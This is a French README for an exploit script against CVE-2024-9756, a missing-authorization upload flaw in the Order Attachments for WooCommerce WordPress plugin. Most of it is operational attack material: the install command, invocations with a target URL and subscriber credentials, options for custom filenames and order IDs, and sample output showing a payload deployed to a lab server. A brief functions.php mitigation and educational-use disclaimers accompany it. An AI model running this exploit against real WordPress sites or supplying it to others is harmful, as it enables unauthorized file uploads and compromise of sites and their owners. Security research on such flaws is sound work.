
Order Attachments for WooCommerce 2.0 - 2.4.1 - Absence d'autorisation permettant à un utilisateur authentifié (Abonné+) un téléchargement limité de fichiers arbitraires
Cet exploit exploite une vulnérabilité de téléchargement arbitraire limité non autorisé dans le plugin Order Attachments for WooCommerce (versions 2.0 à 2.4.1) pour WordPress.
La vulnérabilité permet aux utilisateurs authentifiés (Abonné+) de télécharger des types de fichiers restreints sans autorisation appropriée.
Ce script est fourni uniquement à des fins éducatives et de recherche en sécurité. Toute utilisation non autorisée de cet exploit sur des systèmes dont vous n'êtes pas propriétaire est strictement illégale.
Assurez-vous de disposer des éléments suivants avant d'exécuter l'exploit :
requests → Installer avec :
pip install requests
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD>
Exemple :
python3 CVE-2024-9756.py -u http://192.168.100.74:888/wordpress4 -un khaled -p mypassword
Vous pouvez spécifier des noms de fichiers personnalisés et des identifiants de commande :
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> --filename="custom.png" --filetype="image/png"
python3 CVE-2024-9756.py -u <TARGET_URL> -un <USERNAME> -p <PASSWORD> -o 200
En cas de succès, le script renverra l'URL du fichier téléchargé :
[*] Lancement de l'authentification...
[✔] Authentification réussie.
[*] Déploiement de la charge utile : Nxploit.jpg vers la commande 196...
[✔] Charge utile déployée avec succès !
🔗 URL du fichier : http://192.168.100.74:888/wordpress4/wp-content/uploads/2025/03/Nxploit.jpg
functions.php pour bloquer wp_ajax_wcoa_add_attachment pour les utilisateurs non autorisés :
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => 'Unauthorized'], 403);
exit;
}
Cet exploit est publié à des fins éducatives et de recherche en sécurité uniquement.
Toute utilisation non autorisée contre des systèmes sans autorisation explicite est illégale et punissable en vertu des lois sur la cybersécurité.
Utilisez-le à vos propres risques.